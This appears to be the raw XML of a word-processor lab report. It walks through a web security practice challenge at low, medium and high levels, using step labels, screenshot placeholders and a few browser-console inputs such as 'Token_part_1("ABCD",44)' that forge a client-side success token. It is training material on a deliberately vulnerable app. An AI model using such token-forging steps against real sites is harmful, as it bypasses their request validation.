        </w:numPr>
        <w:ind w:left="0" w:firstLine="142"/>
      </w:pPr>
      <w:r w:rsidRPr="004363B6">
        <w:t>Convert_To_Token_&amp;Match_With_Req</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E673435" w14:textId="51CF63EF" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03C3215C" wp14:editId="04F158A2">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="149030028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5C3F" w14:textId="4C33D456" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="142"/>
      </w:pPr>
      <w:r w:rsidRPr="004363B6">
        <w:t>Submit_Word_Success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5755C60E" w14:textId="1FE14F98" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77F69FC9" wp14:editId="5424056F">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2732154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6B53" w14:textId="1EA8229F" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="142"/>
      </w:pPr>
      <w:r w:rsidRPr="004363B6">
        <w:t>Capture_Success_Req</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7C285D" w14:textId="1C8B09B3" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4013AD6F" wp14:editId="3953850D">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="208966595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885B" w14:textId="41CE1F3A" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="142"/>
      </w:pPr>
      <w:r w:rsidRPr="004363B6">
        <w:t>Generate_Token_Success_&amp;_Match_Req_Token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9290D2" w14:textId="1F515916" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75DB73E7" wp14:editId="360001D8">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="18164073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22AB" w14:textId="2C25063D" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="142"/>
      </w:pPr>
      <w:r w:rsidRPr="004363B6">
        <w:t>Change_Req_Token_With_Generated_&amp;_Forward_Req</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3EFBB6" w14:textId="05CA8F27" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07037B61" wp14:editId="5A6D8123">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="16959111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716C" w14:textId="55398CEE" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="142"/>
      </w:pPr>
      <w:r>
        <w:t>Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6491EC0F" w14:textId="76F4BB0B" w:rsidR="004363B6" w:rsidRPr="009B25FB" w:rsidRDefault="004363B6" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="403E0CC6" wp14:editId="7F1EC4B6">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="4299090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D2DE" w14:textId="77777777" w:rsidR="00005892" w:rsidRDefault="00005892" w:rsidP="00005892">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc198745968"/>
      <w:r>
        <w:t>Med</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p w14:paraId="2ADA3E6A" w14:textId="444E9F5B" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="426"/>
      </w:pPr>
      <w:r w:rsidRPr="004363B6">
        <w:t>Copy_SourceCode_For_Convert_Into_Readable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EDC78A" w14:textId="73EF2279" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A840C12" wp14:editId="448D6314">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="152183242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8245" w14:textId="0AC82282" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="426"/>
      </w:pPr>
      <w:r w:rsidRPr="004363B6">
        <w:t>Convert_into_Readable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AD4FF7" w14:textId="102801BE" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49EE93BC" wp14:editId="2C0E883D">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="14651575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BE33" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="426"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6022EA4E" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="426"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FC22AB9" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="426"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72544294" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="426"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65F0CDC5" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="426"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0846FC7B" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="426"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="032FEA4D" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="426"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F9AB022" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="426"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="541F078A" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="426"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FD49668" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="426"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0184C488" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="426"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="525349CE" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="426"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="554A97A5" w14:textId="681AEAC4" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="426"/>
      </w:pPr>
      <w:r w:rsidRPr="004363B6">
        <w:t>Open_Inspect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2F0B82" w14:textId="4E084F26" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67E449E2" wp14:editId="3147D6F7">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="9198826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EDF7" w14:textId="1C6BA4CA" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="426"/>
      </w:pPr>
      <w:r w:rsidRPr="004363B6">
        <w:t>Change_Value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18507C4D" w14:textId="0B4E842D" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50E90620" wp14:editId="14AFA489">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="16191132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DA21" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="426"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36E58F27" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="426"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79B2D653" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="426"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="757AB79B" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="426"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="331E852B" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="426"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="338FB65E" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="426"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5389AA7E" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="426"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E86995C" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="426"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="029116EF" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="426"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A6D162A" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="426"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B812698" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="426"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03FFEE3F" w14:textId="7FC62C40" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="426"/>
      </w:pPr>
      <w:r w:rsidRPr="004363B6">
        <w:t>Open_Console_&amp;_Type_do_elsesomething('xx').</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7D0A8B" w14:textId="2FE77234" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50C792E0" wp14:editId="19134E4D">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="122115293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B3D9" w14:textId="796AD968" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="426"/>
      </w:pPr>
      <w:r w:rsidRPr="004363B6">
        <w:t>Press_Submit_Button</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DA88E9" w14:textId="5C94A9E9" w:rsidR="004363B6" w:rsidRPr="004363B6" w:rsidRDefault="004363B6" w:rsidP="004363B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73668603" wp14:editId="42C19F91">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="9990349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57DB" w14:textId="77777777" w:rsidR="00005892" w:rsidRDefault="00005892" w:rsidP="00005892">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="_Toc198745969"/>
      <w:r>
        <w:t>High</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:p w14:paraId="6F29A9C7" w14:textId="244622DA" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="007A6DE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r w:rsidRPr="004363B6">
        <w:t>Copy_SourceCode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0BC3A7" w14:textId="57EF900E" w:rsidR="00131E86" w:rsidRDefault="00131E86" w:rsidP="00131E86">
      <w:pPr>
        <w:ind w:left="207"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E7091EE" wp14:editId="6F051B0E">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="180292024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CC68" w14:textId="1E3510CF" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="007A6DE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r w:rsidRPr="004363B6">
        <w:t>Convert_into_Readable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E20B0D7" w14:textId="0FC58A20" w:rsidR="00131E86" w:rsidRDefault="00131E86" w:rsidP="00131E86">
      <w:pPr>
        <w:ind w:left="207"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D6711C7" wp14:editId="4E856874">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="48360249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44EB" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00131E86">
      <w:pPr>
        <w:ind w:left="207"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D71294E" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00131E86">
      <w:pPr>
        <w:ind w:left="207"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B2CD9C4" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00131E86">
      <w:pPr>
        <w:ind w:left="207"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15AB802A" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00131E86">
      <w:pPr>
        <w:ind w:left="207"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65ED4CD1" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00131E86">
      <w:pPr>
        <w:ind w:left="207"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7965896F" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00131E86">
      <w:pPr>
        <w:ind w:left="207"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59587195" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00131E86">
      <w:pPr>
        <w:ind w:left="207"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50DCCC74" w14:textId="36F05C7A" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="007A6DE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r w:rsidRPr="004363B6">
        <w:t>Open_Inspect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2FAC42" w14:textId="529A53EC" w:rsidR="00131E86" w:rsidRDefault="00131E86" w:rsidP="00131E86">
      <w:pPr>
        <w:ind w:left="207"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3123E099" wp14:editId="5BCC7A87">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="90446791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E28D" w14:textId="68FF2ABA" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="007A6DE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r w:rsidRPr="004363B6">
        <w:t>Change_Value_to_success.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5705371C" w14:textId="40F1D113" w:rsidR="00131E86" w:rsidRDefault="00131E86" w:rsidP="00131E86">
      <w:pPr>
        <w:ind w:left="207"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59B4243F" wp14:editId="0B1911CC">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="5411585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2CDC" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00131E86">
      <w:pPr>
        <w:ind w:left="207"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AF053DE" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00131E86">
      <w:pPr>
        <w:ind w:left="207"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E7E80F1" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00131E86">
      <w:pPr>
        <w:ind w:left="207"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49674636" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00131E86">
      <w:pPr>
        <w:ind w:left="207"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28CAF719" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00131E86">
      <w:pPr>
        <w:ind w:left="207"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F253A6B" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="00131E86">
      <w:pPr>
        <w:ind w:left="207"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F723D64" w14:textId="3F4E9A55" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="007A6DE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r w:rsidRPr="004363B6">
        <w:t>Open_Script_in_Console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0507FD56" w14:textId="3D9BF109" w:rsidR="00131E86" w:rsidRDefault="00131E86" w:rsidP="00131E86">
      <w:pPr>
        <w:ind w:left="207"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="041884AC" wp14:editId="76829849">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="206437725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9065" w14:textId="1636F215" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="007A6DE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r w:rsidRPr="004363B6">
        <w:t>Run_Token_part_1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B4D094" w14:textId="7A503DEC" w:rsidR="007A6DE1" w:rsidRDefault="007A6DE1" w:rsidP="007A6DE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A6DE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Token_part_1("ABCD",44)sseccus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CB020F" w14:textId="78C31EA0" w:rsidR="00131E86" w:rsidRPr="00131E86" w:rsidRDefault="00131E86" w:rsidP="00131E86">
      <w:pPr>
        <w:ind w:left="207"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="797B0EB7" wp14:editId="49E52328">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="4503640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E853" w14:textId="6234A18C" w:rsidR="004363B6" w:rsidRDefault="004363B6" w:rsidP="007A6DE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r w:rsidRPr="004363B6">
        <w:t>Run_Token_part_2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC9E03F" w14:textId="79451D14" w:rsidR="007A6DE1" w:rsidRDefault="007A6DE1" w:rsidP="007A6DE1">
      <w:pPr>
        <w:ind w:left="207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7A6DE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>token_part_2("XX")7f1bfaaf829f785ba5801d5bf68c1ecaf95ce04545462c8b8f311dfc9014068a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713C5542" w14:textId="3DEE0A45" w:rsidR="00131E86" w:rsidRPr="007A6DE1" w:rsidRDefault="00131E86" w:rsidP="007A6DE1">
      <w:pPr>
        <w:ind w:left="207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E102187" wp14:editId="10D4AC5D">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
